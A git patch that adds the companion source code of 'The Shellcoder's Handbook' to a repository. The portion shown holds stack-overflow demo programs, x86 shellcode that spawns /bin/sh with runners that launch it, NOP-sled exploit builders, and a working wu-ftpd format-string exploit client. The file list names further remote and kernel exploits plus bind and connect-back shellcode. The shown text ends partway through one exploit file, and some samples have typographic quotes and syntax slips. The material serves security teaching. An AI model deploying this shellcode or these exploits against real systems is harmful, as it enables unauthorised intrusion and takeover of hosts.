From 9da300b22f82e3b9f0888de60e6fb2a029a53a0e Mon Sep 17 00:00:00 2001
From: Elia Pinto <devzero2000@rpm5.org>
Date: Wed, 22 Jan 2014 02:38:13 -0800
Subject: [PATCH] add Sample Code extracted from
 http://media.wiley.com/product_ancillary/83/07645446/DOWNLOAD/Source_Files.zip

---
 Chapter_02/Shellcoders02sampleprogram01.c     |  21 +
 Chapter_02/Shellcoders02sampleprogram02.c     |  25 +
 Chapter_02/Shellcoders02sampleprogram03.c     |  27 +
 Chapter_02/Shellcoders02sampleprogram04.c     |  33 +
 Chapter_02/Shellcoders02sampleprogram05.c     |  32 +
 Chapter_02/Shellcoders02sampleprogram06.c     |  64 ++
 Chapter_02/Shellcoders02sampleprogram07.c     |  70 ++
 Chapter_03/Shellcoders03sampleprogram01.c     |  26 +
 Chapter_03/Shellcoders03sampleprogram02.c     |  28 +
 Chapter_03/Shellcoders03sampleprogram03.c     |  31 +
 Chapter_04/Shellcoders04WU-FTP-Exploit1.c     | 152 ++++
 Chapter_04/Shellcoders04WU-FTP-Exploit2.c     | 130 ++++
 Chapter_04/Shellcoders04sampleprogram01.c     |  47 ++
 Chapter_04/Shellcoders04sampleprogram02.c     |  35 +
 Chapter_04/Shellcoders04sampleprogram03.c     |  38 +
 Chapter_05/Shellcoders05codesnippet01.c       |  58 ++
 Chapter_05/Shellcoders05heapexploit01.c       | 149 ++++
 Chapter_05/Shellcoders05sampleprogram01.c     |  34 +
 Chapter_05/Shellcoders05sampleprogram02.c     |  36 +
 Chapter_05/Shellcoders05sampleprogram03.c     |  41 +
 Chapter_06/Shellcoders06codesnippet01.c       |  49 ++
 Chapter_07/Shellcoders07sampleprogram01.c     | 726 ++++++++++++++++++
 Chapter_07/Shellcoders07sampleprogram02.c     |  41 +
 Chapter_08/Shellcoders08sampleprogram01.c     |  43 ++
 Chapter_08/Shellcoders08sampleprogram02.c     |  38 +
 Chapter_08/Shellcoders08sampleprogram03.c     |  59 ++
 Chapter_08/Shellcoders08sampleprogram04.c     |  67 ++
 Chapter_08/Shellcoders08sampleprogram05.c     | 103 +++
 Chapter_08/Shellcoders08sampleprogram06.c     | 112 +++
 Chapter_08/Shellcoders08sampleprogram07.c     |  51 ++
 Chapter_08/Shellcoders08sampleprogram08.c     | 110 +++
 Chapter_08/Shellcoders08sampleprogram09.c     |  31 +
 Chapter_08/Shellcoders08sampleprogram10.c     |  78 ++
 Chapter_08/Shellcoders08sampleprogram11.c     |  42 +
 Chapter_08/Shellcoders08sampleprogram12.c     |  35 +
 Chapter_08/Shellcoders08sampleprogram13.c     | 152 ++++
 Chapter_09/Shellcoders09codesnippet01.txt     |  22 +
 Chapter_09/Shellcoders09codesnippet02.txt     |  31 +
 Chapter_09/Shellcoders09codesnippet03.txt     |  23 +
 Chapter_09/Shellcoders09codesnippet04.txt     |  25 +
 Chapter_09/Shellcoders09codesnippet05.txt     |  25 +
 Chapter_09/Shellcoders09codesnippet06.txt     |  26 +
 Chapter_09/Shellcoders09codesnippet07.txt     |  27 +
 Chapter_09/Shellcoders09codesnippet08.txt     |  39 +
 Chapter_09/Shellcoders09codesnippet09.txt     |  26 +
 Chapter_09/Shellcoders09sampleprogram01.c     |  36 +
 Chapter_09/Shellcoders09sampleprogram02.c     |  47 ++
 Chapter_11/Shellcoders11-BF_shell.s           | 353 +++++++++
 Chapter_11/Shellcoders11-dtspcd-exploit.py    | 272 +++++++
 Chapter_11/Shellcoders11-find_sym.c           |  80 ++
 Chapter_11/Shellcoders11sampleprogram01.c     |  54 ++
 Chapter_11/Shellcoders11sampleprogram02.c     |  61 ++
 Chapter_12/Shellcoders12-bindsocket.txt       |  85 ++
 Chapter_12/Shellcoders12-connectback.txt      |  72 ++
 Chapter_12/Shellcoders12-findsocket.txt       |  78 ++
 .../Shellcoders12-rpc-ttdbserverd-exploit.txt | 242 ++++++
 Chapter_12/Shellcoders12sampleprogram01.c     |  55 ++
 Chapter_12/Shellcoders12sampleprogram01.txt   |  55 ++
 Chapter_12/Shellcoders12sampleprogram02.c     |  27 +
 Chapter_12/Shellcoders12sampleprogram02.txt   |  27 +
 Chapter_12/Shellcoders12sampleprogram03.c     |  64 ++
 Chapter_12/Shellcoders12sampleprogram03.txt   |  64 ++
 Chapter_12/Shellcoders12sampleprogram04.c     |  64 ++
 Chapter_12/Shellcoders12sampleprogram04.txt   |  46 ++
 Chapter_12/Shellcoders12sampleprogram05.txt   |  44 ++
 Chapter_12/Shellcoders12sampleprogram06.txt   |  78 ++
 Chapter_12/Shellcoders12sampleprogram07.txt   |  72 ++
 Chapter_14/bin/RIOT.exe                       | Bin 0 -> 184436 bytes
 Chapter_14/bin/faultmon.exe                   | Bin 0 -> 65536 bytes
 Chapter_14/bin/input_store/1.dat              |  10 +
 Chapter_14/bin/input_store/2.dat              |   9 +
 Chapter_14/bin/input_store/3.dat              |   9 +
 Chapter_14/src/FaultInject.cpp                | 257 +++++++
 Chapter_14/src/FaultInject.h                  |  83 ++
 Chapter_14/src/NetIO.cpp                      | 305 ++++++++
 Chapter_14/src/NetIO.h                        |  24 +
 Chapter_14/src/RIOT.cpp                       | 237 ++++++
 Chapter_14/src/RIOT.dsp                       | 112 +++
 Chapter_14/src/RIOT.dsw                       |  29 +
 Chapter_14/src/input_store/1.dat              |  10 +
 Chapter_14/src/input_store/2.dat              |   9 +
 Chapter_14/src/input_store/3.dat              |   9 +
 Chapter_15/Shellcoders15-dtloginspike.txt     |  85 ++
 Chapter_17/Shellcoders17sampleprogram01.txt   |  40 +
 Chapter_18/Shellcoders18-vtinject-cpp.txt     | 128 +++
 Chapter_18/Shellcoders18-vulntrace-cpp.txt    |  96 +++
 Chapter_18/Shellcoders18sampleprogram01.txt   |  51 ++
 Chapter_20/Shellcoders20-rsc-c.txt            | 247 ++++++
 Chapter_21/Shellcoders21sampleprogram01.txt   |  58 ++
 Chapter_22/Shellcoders22-ibm-db2-exploit.txt  |  77 ++
 .../Shellcoders22-xdb-exploit-linux.txt       | 215 ++++++
 .../Shellcoders22-xdb-exploit-win32.txt       | 233 ++++++
 ...Shellcoders23-OpenBSD-select()-exploit.txt |  53 ++
 .../Shellcoders24-OpenBSD-exploit1-c.txt      | 232 ++++++
 Chapter_24/Shellcoders24-moka-c.txt           | 118 +++
 ...oders24-solaris-vfs_getvfssw()-exploit.txt |  78 ++
 ...4exec_ibcs2_coff_prep_zmagic()-exploit.txt | 319 ++++++++
 Chapter_24/Shellcoders24sampleprogram01.txt   |  36 +
 Chapter_24/Shellcoders24sampleprogram02.txt   |  91 +++
 99 files changed, 8294 insertions(+)
 create mode 100644 Chapter_02/Shellcoders02sampleprogram01.c
 create mode 100644 Chapter_02/Shellcoders02sampleprogram02.c
 create mode 100644 Chapter_02/Shellcoders02sampleprogram03.c
 create mode 100644 Chapter_02/Shellcoders02sampleprogram04.c
 create mode 100644 Chapter_02/Shellcoders02sampleprogram05.c
 create mode 100644 Chapter_02/Shellcoders02sampleprogram06.c
 create mode 100644 Chapter_02/Shellcoders02sampleprogram07.c
 create mode 100644 Chapter_03/Shellcoders03sampleprogram01.c
 create mode 100644 Chapter_03/Shellcoders03sampleprogram02.c
 create mode 100644 Chapter_03/Shellcoders03sampleprogram03.c
 create mode 100644 Chapter_04/Shellcoders04WU-FTP-Exploit1.c
 create mode 100644 Chapter_04/Shellcoders04WU-FTP-Exploit2.c
 create mode 100644 Chapter_04/Shellcoders04sampleprogram01.c
 create mode 100644 Chapter_04/Shellcoders04sampleprogram02.c
 create mode 100644 Chapter_04/Shellcoders04sampleprogram03.c
 create mode 100644 Chapter_05/Shellcoders05codesnippet01.c
 create mode 100644 Chapter_05/Shellcoders05heapexploit01.c
 create mode 100644 Chapter_05/Shellcoders05sampleprogram01.c
 create mode 100644 Chapter_05/Shellcoders05sampleprogram02.c
 create mode 100644 Chapter_05/Shellcoders05sampleprogram03.c
 create mode 100644 Chapter_06/Shellcoders06codesnippet01.c
 create mode 100644 Chapter_07/Shellcoders07sampleprogram01.c
 create mode 100644 Chapter_07/Shellcoders07sampleprogram02.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram01.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram02.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram03.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram04.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram05.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram06.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram07.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram08.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram09.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram10.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram11.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram12.c
 create mode 100644 Chapter_08/Shellcoders08sampleprogram13.c
 create mode 100644 Chapter_09/Shellcoders09codesnippet01.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet02.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet03.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet04.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet05.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet06.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet07.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet08.txt
 create mode 100644 Chapter_09/Shellcoders09codesnippet09.txt
 create mode 100644 Chapter_09/Shellcoders09sampleprogram01.c
 create mode 100644 Chapter_09/Shellcoders09sampleprogram02.c
 create mode 100644 Chapter_11/Shellcoders11-BF_shell.s
 create mode 100644 Chapter_11/Shellcoders11-dtspcd-exploit.py
 create mode 100644 Chapter_11/Shellcoders11-find_sym.c
 create mode 100644 Chapter_11/Shellcoders11sampleprogram01.c
 create mode 100644 Chapter_11/Shellcoders11sampleprogram02.c
 create mode 100644 Chapter_12/Shellcoders12-bindsocket.txt
 create mode 100644 Chapter_12/Shellcoders12-connectback.txt
 create mode 100644 Chapter_12/Shellcoders12-findsocket.txt
 create mode 100644 Chapter_12/Shellcoders12-rpc-ttdbserverd-exploit.txt
 create mode 100644 Chapter_12/Shellcoders12sampleprogram01.c
 create mode 100644 Chapter_12/Shellcoders12sampleprogram01.txt
 create mode 100644 Chapter_12/Shellcoders12sampleprogram02.c
 create mode 100644 Chapter_12/Shellcoders12sampleprogram02.txt
 create mode 100644 Chapter_12/Shellcoders12sampleprogram03.c
 create mode 100644 Chapter_12/Shellcoders12sampleprogram03.txt
 create mode 100644 Chapter_12/Shellcoders12sampleprogram04.c
 create mode 100644 Chapter_12/Shellcoders12sampleprogram04.txt
 create mode 100644 Chapter_12/Shellcoders12sampleprogram05.txt
 create mode 100644 Chapter_12/Shellcoders12sampleprogram06.txt
 create mode 100644 Chapter_12/Shellcoders12sampleprogram07.txt
 create mode 100644 Chapter_14/bin/RIOT.exe
 create mode 100644 Chapter_14/bin/faultmon.exe
 create mode 100644 Chapter_14/bin/input_store/1.dat
 create mode 100644 Chapter_14/bin/input_store/2.dat
 create mode 100644 Chapter_14/bin/input_store/3.dat
 create mode 100644 Chapter_14/src/FaultInject.cpp
 create mode 100644 Chapter_14/src/FaultInject.h
 create mode 100644 Chapter_14/src/NetIO.cpp
 create mode 100644 Chapter_14/src/NetIO.h
 create mode 100644 Chapter_14/src/RIOT.cpp
 create mode 100644 Chapter_14/src/RIOT.dsp
 create mode 100644 Chapter_14/src/RIOT.dsw
 create mode 100644 Chapter_14/src/input_store/1.dat
 create mode 100644 Chapter_14/src/input_store/2.dat
 create mode 100644 Chapter_14/src/input_store/3.dat
 create mode 100644 Chapter_15/Shellcoders15-dtloginspike.txt
 create mode 100644 Chapter_17/Shellcoders17sampleprogram01.txt
 create mode 100644 Chapter_18/Shellcoders18-vtinject-cpp.txt
 create mode 100644 Chapter_18/Shellcoders18-vulntrace-cpp.txt
 create mode 100644 Chapter_18/Shellcoders18sampleprogram01.txt
 create mode 100644 Chapter_20/Shellcoders20-rsc-c.txt
 create mode 100644 Chapter_21/Shellcoders21sampleprogram01.txt
 create mode 100644 Chapter_22/Shellcoders22-ibm-db2-exploit.txt
 create mode 100644 Chapter_22/Shellcoders22-xdb-exploit-linux.txt
 create mode 100644 Chapter_22/Shellcoders22-xdb-exploit-win32.txt
 create mode 100644 Chapter_23/Shellcoders23-OpenBSD-select()-exploit.txt
 create mode 100644 Chapter_24/Shellcoders24-OpenBSD-exploit1-c.txt
 create mode 100644 Chapter_24/Shellcoders24-moka-c.txt
 create mode 100644 Chapter_24/Shellcoders24-solaris-vfs_getvfssw()-exploit.txt
 create mode 100644 Chapter_24/Shellcoders24exec_ibcs2_coff_prep_zmagic()-exploit.txt
 create mode 100644 Chapter_24/Shellcoders24sampleprogram01.txt
 create mode 100644 Chapter_24/Shellcoders24sampleprogram02.txt

diff --git a/Chapter_02/Shellcoders02sampleprogram01.c b/Chapter_02/Shellcoders02sampleprogram01.c
new file mode 100644
index 0000000..23bd1c5
--- /dev/null
+++ b/Chapter_02/Shellcoders02sampleprogram01.c
@@ -0,0 +1,21 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+int main () {
+
+    int array[5] = {1, 2, 3, 4, 5};
+    
+    printf(“%d\n”, array[5];
+}
diff --git a/Chapter_02/Shellcoders02sampleprogram02.c b/Chapter_02/Shellcoders02sampleprogram02.c
new file mode 100644
index 0000000..0806872
--- /dev/null
+++ b/Chapter_02/Shellcoders02sampleprogram02.c
@@ -0,0 +1,25 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+int main () {
+
+    int array[5];
+    int i;
+    
+    for (i = 0; i <= 255; ++i){
+            array[i] = 10;
+    }
+}
+
diff --git a/Chapter_02/Shellcoders02sampleprogram03.c b/Chapter_02/Shellcoders02sampleprogram03.c
new file mode 100644
index 0000000..27cffec
--- /dev/null
+++ b/Chapter_02/Shellcoders02sampleprogram03.c
@@ -0,0 +1,27 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+void function(int a, int b){
+     int array[5];
+}
+
+main()
+{
+ function(1,2);
+
+ printf("This is where the return address points”);
+}
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram04.c b/Chapter_02/Shellcoders02sampleprogram04.c
new file mode 100644
index 0000000..52712fe
--- /dev/null
+++ b/Chapter_02/Shellcoders02sampleprogram04.c
@@ -0,0 +1,33 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #4
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+void return_input (void){ 
+        char array[30]; 
+
+        gets (array); 
+        printf("%s\n", array); 
+
+}
+
+
+main() { 
+        return_input(); 
+
+        return 0; 
+
+}
+
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram05.c b/Chapter_02/Shellcoders02sampleprogram05.c
new file mode 100644
index 0000000..e171a1f
--- /dev/null
+++ b/Chapter_02/Shellcoders02sampleprogram05.c
@@ -0,0 +1,32 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #5
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] =    
+ "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+ "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+ "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+    
+int main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
+
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram06.c b/Chapter_02/Shellcoders02sampleprogram06.c
new file mode 100644
index 0000000..8a857a6
--- /dev/null
+++ b/Chapter_02/Shellcoders02sampleprogram06.c
@@ -0,0 +1,64 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #6
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdlib.h>
+
+#define offset_size                    0
+#define buffer_size                    512
+
+char sc[] =
+  "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+  "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+  "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+
+unsigned long find_start(void) {
+   __asm__("movl %esp,%eax");
+}
+
+int main(int argc, char *argv[]) 
+{
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=offset_size, bsize=buffer_size;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  addr = find_start() - offset;
+  printf("Attempting address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+       *(addr_ptr++) = addr;
+
+  ptr += 4;
+
+  for (i = 0; i < strlen(sc); i++)
+          *(ptr++) = sc[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"BUF=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+
+
+
+
+
diff --git a/Chapter_02/Shellcoders02sampleprogram07.c b/Chapter_02/Shellcoders02sampleprogram07.c
new file mode 100644
index 0000000..76948fa
--- /dev/null
+++ b/Chapter_02/Shellcoders02sampleprogram07.c
@@ -0,0 +1,70 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 2: Stack Overflows
+Sample Program #7
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdlib.h>
+
+ #define DEFAULT_OFFSET                    0
+ #define DEFAULT_BUFFER_SIZE             512
+ #define NOP                            0x90
+
+ char shellcode[] =
+
+     "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+     "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+     "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
+
+
+unsigned long get_sp(void) {
+   __asm__("movl %esp,%eax");
+}
+
+void main(int argc, char *argv[]) 
+{
+  char *buff, *ptr;
+  long *addr_ptr, addr;
+  int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
+  int i;
+
+  if (argc > 1) bsize  = atoi(argv[1]);
+  if (argc > 2) offset = atoi(argv[2]);
+
+  if (!(buff = malloc(bsize))) {
+        printf("Can't allocate memory.\n");
+        exit(0);
+  }
+
+  addr = get_sp() - offset;
+  printf("Using address: 0x%x\n", addr);
+
+  ptr = buff;
+  addr_ptr = (long *) ptr;
+  for (i = 0; i < bsize; i+=4)
+         *(addr_ptr++) = addr;
+
+  for (i = 0; i < bsize/2; i++)
+         buff[i] = NOP;
+
+  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
+  for (i = 0; i < strlen(shellcode); i++)
+         *(ptr++) = shellcode[i];
+
+  buff[bsize - 1] = '\0';
+
+  memcpy(buff,"BUF=",4);
+  putenv(buff);
+  system("/bin/bash");
+}
+
+
diff --git a/Chapter_03/Shellcoders03sampleprogram01.c b/Chapter_03/Shellcoders03sampleprogram01.c
new file mode 100644
index 0000000..9c63d2a
--- /dev/null
+++ b/Chapter_03/Shellcoders03sampleprogram01.c
@@ -0,0 +1,26 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 3: Shellcode
+Sample Program #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] = "\xbb\x00\x00\x00\x00"           
+                   "\xb8\x01\x00\x00\x00"                  
+                   "\xcd\x80"; 
+
+int main()
+{
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
diff --git a/Chapter_03/Shellcoders03sampleprogram02.c b/Chapter_03/Shellcoders03sampleprogram02.c
new file mode 100644
index 0000000..c5b1414
--- /dev/null
+++ b/Chapter_03/Shellcoders03sampleprogram02.c
@@ -0,0 +1,28 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 3: Shellcode
+Sample Program #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] = "\xbb\x00\x00\x00\x00"           
+                   "\xb8\xfc\x00\x00\x00"                  
+                   "\xcd\x80";                  
+
+int main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
+
diff --git a/Chapter_03/Shellcoders03sampleprogram03.c b/Chapter_03/Shellcoders03sampleprogram03.c
new file mode 100644
index 0000000..5ca31bf
--- /dev/null
+++ b/Chapter_03/Shellcoders03sampleprogram03.c
@@ -0,0 +1,31 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 3: Shellcode
+Sample Program #3
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+char shellcode[] =    
+        "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46"
+        "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1"
+        "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x41\x41\x41\x41"
+        "\x4b\x4b\x4b\x4b";               
+
+int main()
+{
+
+  int *ret;
+  ret = (int *)&ret + 2;
+  (*ret) = (int)shellcode;
+}
+
+
+
diff --git a/Chapter_04/Shellcoders04WU-FTP-Exploit1.c b/Chapter_04/Shellcoders04WU-FTP-Exploit1.c
new file mode 100644
index 0000000..d4364f1
--- /dev/null
+++ b/Chapter_04/Shellcoders04WU-FTP-Exploit1.c
@@ -0,0 +1,152 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 4: Introduction to Format String Bugs
+wu-FTP Exploit #1
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+  #include <stdio.h>  
+  #include <string.h>
+  #include <stdlib.h>
+  #include <sys/types.h>
+  #include <sys/socket.h>
+  #include <sys/time.h>
+  #include <netdb.h>
+  #include <unistd.h>
+  #include <netinet/in.h>
+  #include <arpa/inet.h>
+  #include <signal.h>
+  #include <errno.h>
+
+
+  int connect_to_server(char*host){
+       struct hostent *hp;
+       struct sockaddr_in cl;
+       int sock;
+   
+       if(host==NULL||*host==(char)0){
+                       fprintf(stderr,"Invalid hostname\n");
+
+               exit(1);
+
+        }
+
+       if((cl.sin_addr.s_addr=inet_addr(host))==-1) 
+       {
+               if((hp=gethostbyname(host))==NULL) 
+               {
+                       fprintf(stderr,"Cannot resolve %s\n",host);                   exit(1);
+               }
+
+               memcpy((char*)&cl.sin_addr,(char*)hp->h_addr,sizeof(cl.sin_addr));
+
+        }
+        if((sock=socket(PF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
+        {
+
+               fprintf(stderr,"Error creating socket: %s\n",strerror(errno));
+               exit(1);   
+        }
+       
+        cl.sin_family=PF_INET;
+        cl.sin_port=htons(21);
+
+        if(connect(sock,(struct sockaddr*)&cl,sizeof(cl))==-1)
+        {
+            fprintf(stderr,"Cannot connect to %s: %s\n",host,strerror(errno));
+        }
+  
+        return sock;
+   }
+
+
+  int receive_from_server( int s, int print )
+  {
+       int retval;
+       char buff[ 1024 * 64];	
+
+       memset( buff, 0, 1024 * 64 );
+       retval = recv( s, buff, (1024 * 63), 0 );
+       if( retval > 0 )
+       {
+             if( print ) 
+                   printf( "%s", buff );
+       }
+       else
+       {
+             if( print) 
+                      printf( "Nothing to recieve\n" );
+
+             return 0;
+        }
+
+        return 1;
+   }
+
+  int ftp_send( int s, char *psz )
+{
+        send( s, psz, strlen( psz ), 0 );
+        return 1;
+  }
+	
+
+    int syntax()
+   {
+        printf("Use\ndo_wu <host> <format string>\n");
+        return 1;
+  }
+
+
+   int main( int argc, char *argv[] )
+   {
+          int s;
+          char buff[ 1024 * 64 ];
+          char tmp[ 4096 ];
+        
+      if( argc != 4 ) 
+              return syntax();
+
+           s = connect_to_server( argv[1] );
+           
+           if( s <= 0 )
+                   _exit( 1 );
+
+          receive_from_server( s, 0 );
+
+          ftp_send( s, "user anonymous\n" );
+          receive_from_server( s, 0 );
+          ftp_send( s, "pass foo@example.com\n" );
+
+          receive_from_server( s, 0 );
+
+        if( atoi( argv[3] ) == 1 )
+        {
+               printf("Press a key to send the string...\n");
+               getc( stdin );	
+        }
+
+           strcat( buff, "site index " );
+           sprintf( tmp, "%.4000s\n", argv[2] );
+           strcat( buff, tmp );
+
+           ftp_send( s, buff );
+
+           receive_from_server( s, 1 );
+
+           shutdown( s, SHUT_RDWR );
+
+      return 1;
+   }
+
+
+
+
+
diff --git a/Chapter_04/Shellcoders04WU-FTP-Exploit2.c b/Chapter_04/Shellcoders04WU-FTP-Exploit2.c
new file mode 100644
index 0000000..826b5a4
--- /dev/null
+++ b/Chapter_04/Shellcoders04WU-FTP-Exploit2.c
@@ -0,0 +1,130 @@
+/*
+
+The Shellcoder's Handbook: Discovering and Exploiting Security Holes
+Jack Koziol, David Litchfield, Dave Aitel, Chris Anley, 
+Sinan Eren, Neel Mehta, Riley Hassell
+Publisher: John Wiley & Sons
+ISBN: 0764544683
+
+Chapter 4: Introduction to Format String Bugs
+wu-FTP Exploit #2
+
+Please send comments/feedback to jack@infosecinstitute.com or visit http://www.infosecinstitute.com 
+
+*/
+
+#include <stdio.h>
+#include <stdlib.h>
+
+int safe_strcat( char *dest, char *src, unsigned dest_len )
+{
+     if( ( dest == NULL ) || ( src == NULL ) )
+             return 0;
+
+        if ( strlen( src ) + strlen( dest ) + 10 >= dest_len )
+             return 0;
+
+     strcat( dest, src );
+
+     return 1;
+}
+
+int err( char *msg )
+{
+     printf("%s\n", msg);
+     return 1;
+}
+
+int main( int argc, char *argv[] )
+{
+     // modify the strings below to upload different data to the wu-ftpd process...
+     char *string_to_upload = "mary had a little lamb";
+     unsigned int addr = 0x0806d3b0;
+
+     // this is the offset of the parameter that 'contains' the start of our string.
+     unsigned int param_num = 272;
+     char buff[ 4096 ] = "";
+     int buff_size = 4096;
+     char tmp[ 4096 ] = "";
+     int i, j, num_so_far = 6, num_to_print, num_so_far_mod;
+     unsigned short s;
+     char *psz;
+     int num_addresses, a[4];
+     
+     // first work out How many addresses there are. num bytes / 2 + num bytes mod 2.
+
+     num_addresses = (strlen( string_to_upload ) / 2) + strlen( string_to_upload) % 2;
+     
+     for( i = 0; i < num_addresses; i++ )
+     {
+            a[0] = addr & 0xff;
+            a[1] = (addr & 0xff00) >> 8;
+            a[2] = (addr & 0xff0000) >> 16;
+            a[3] = (addr) >> 24;
+            
+            sprintf( tmp, "\\x%.02x\\x%.02x\\x%.02x\\x%.02x", a[0], a[1], a[2], a[3] );
+
